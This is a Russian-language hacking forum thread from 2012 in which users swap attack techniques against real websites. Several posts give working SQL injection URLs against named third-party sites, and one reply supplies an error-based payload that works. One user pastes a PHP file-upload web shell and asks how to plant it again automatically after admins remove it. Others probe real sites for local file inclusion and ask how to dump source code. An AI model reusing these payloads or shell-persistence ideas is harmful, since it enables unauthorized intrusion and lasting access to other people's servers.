Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    А как его заюзать без пробелов? limit(0,1) не проходит
     
  2. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Ребята как раскрутить дальше??
    Code:
    http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,version()+)+)+)='1
    делал так
    Code:
    http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+)+)+)='1 ОБЛОМ.
    и так
    Code:
    http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.
    Так же не решен вопрос с этой скулей
    Code:
    http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html
    Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо
     
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.
     
  4. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Тут наверно _http://forum.antichat.ru/thread58123.html
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Пользуйся)
     
    _________________________
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    WendM,
    Держите решение Вашей проблемы:
    Code:
    http://www.muscletalk.ru/pharma.php?id=999999.9'+in+(select(@:=1)||@+from+(select+1+union+select+2+union+select+3)k+group+by+concat(@@version,!@)having@||min(@:=0))+and+'1#
     
    1 person likes this.
  7. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Спасибо) Но такой вариант не проходит на
    Code:
    http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
    :rolleyes:
     
  8. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Тестирую на локалке метод залива шелла через sql inj.
    Уязвимый php
    PHP:
    <?php

    $link 
    mysql_connect("localhost""root""");

    mysql_select_db("site");

    if (!isset(
    $_GET['id'])) {

    $result=mysql_query("SELECT * FROM news");

    while (
    $line mysql_fetch_array($resultMYSQL_ASSOC)) {

    print 
    "<a href='mynews.php?id=".$line['id']."'>Новость №".$line['id']."</a><br>";

    }

    exit;

    }

    $query "SELECT text FROM news WHERE id= ".$_GET['id'];

     
    $result mysql_query($query);

    print 
    "<table>";

        while (
    $line mysql_fetch_array($resultMYSQL_ASSOC)) {

            print 
    "<tr>";

            foreach (
    $line as $col_value) {

                print 
    "<td>$col_value</td>";

            }

            print 
    "</tr>";

        }

        print 
    "</table>";

        
    mysql_free_result($result);

        
    mysql_close($link);
     
    ?>
    Делаю запрос
    Code:
    http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user='root'+--+
    Вылетают ошибки.
    Делаю так
    Code:
    http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user=0x27726F6F7427+--+
    Выводится First news
    Что не так делаю? :rolleyes:
     
  9. dynda2000

    dynda2000 New Member

    Joined:
    16 Mar 2012
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Получилось залить шелл через phpmyadmin, но админы на серве постоянно переустанавливают свой серв и стирают мой шелл, даже иногда не устанавливают phpmyadmin, но вот седня снова они его установили я побырому залил шел во все щели но это не поможет после переустановки все снова слетит. Но база mysql она всегда таже, вот я и подумал можно ли создать там таблицу с этим кодом
    PHP:
    <?php if(isset($_POST[ok])){if(move_uploaded_file($_FILES[fnm][tmp_name], $_POST[name])){echo "<a href=" $_POST[name] . ">Click</a>";} else {die("err");}}?><form  methodost enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit namek><br></form>
    И как то указать чтоб он автоматически его создавал по указанному адресу например раз в неделю или при его отсутствии. Помогите плииз.
     
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    dynda2000
    http://video.antichat.ru/video/17/ прокатит?
     
    1 person likes this.
  11. Tir TNT

    Tir TNT New Member

    Joined:
    1 Oct 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Нашел дыру Nginx & PHP via FastCGI на member.my-addr.com. Хочется слить исходники многих их сервисов. Пример:
    Залить любой файл на сайт вроде никак. Есть варианты решения проблемы?

    Описание дыры:
    _http://cnedelcu.blogspot.com/2010/05/nginx-php-via-fastcgi-important.html
     
  12. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Ваши вопросы по уязвимостям
    По моему я в правильный раздел написал.
    Ну не могу я получить количество стандартными grpoup by и order by, так же перебор через union select тоже не дает результата. Мануалы по sql inj молчат на этот случай.

    Вопрос: " Можно ли получить количество полей при не работающих вариантах с grpoup by и order by. Если да, то как?" tnx!)
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Можно. Зависит от случая. И от WAF кстати тоже.
     
    _________________________
  14. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    LFI не получается найти - задолбался перебирать конструкции ../../etc/passwd, RFI паходу нет.
    Но при запросе
    _ttp://www.*********.ru/index.php?page=info.php успешно выводится содержимое инфо.пхп B frame

    _ttp://www.********.ru/index.php?page=test.php также успешно выводится B frame на странице
    September 5, 2004
    /home/t*******1/public_html/sitenameАга

    естьли возможность проинклюдить файл info.php или test.php как показано здесь
    и если да то как потом запустить всю эту конструкцию) если я никак не могу добраца до ../етс/пассвд или не обязательно вообще до него добираться?
    или как это все осуществить.капец я запутался чета уже:(
     
  15. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Для заливки шелла через phpinfo();, тебе нужен LFI и доступ к tmp, если не можешь прочетать tmp, то не как. понятное дело ты можешь в сплоите поменять директории, но прав на запись тебе не кто не даст.

    P.S. сплоит не будет работать, если phpinfo(), не создает глобальный массив $_FILES[]
     
  16. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Это LFI?
    _http://web.fhnw.ch/technik/projekte/eit/Fruehling2011/JaegLoch/index.php?include=

    Если да, то почему не получается получить etc/passwd :(
     
  17. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Я пожалуй повторю:
    http://forum.antichat.ru/showpost.php?p=3308397&postcount=21440

    Я не пойму это юмор какой-то ачатовский, или вы тут всегда так круто всё взламываете?
     
    1 person likes this.
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    И взаправду. Чего стоило в базовый код страницы для начала посмотреть? Ты, мистер умник, как раз такой юморной, что только для тебя такие ответы и посты создаются. И во фразе - `Я пожалуй повторю`, после буквы Я ставится запятая.
     
  19. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    да там одмин походу крякнул.уже 10 дней жду активации акка на этом пхпББ
     
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Не напрягайся =) Там тупой ифрейм. Це не инклуд позор на мои седины. http://www.prodisney.ru/articles/news1012.php?nid='3455&cat=n&f=1 Вот раскрытие путей, как бонус )
     
    #21280 Cennarios, 24 Oct 2012
    Last edited: 24 Oct 2012
Thread Status:
Not open for further replies.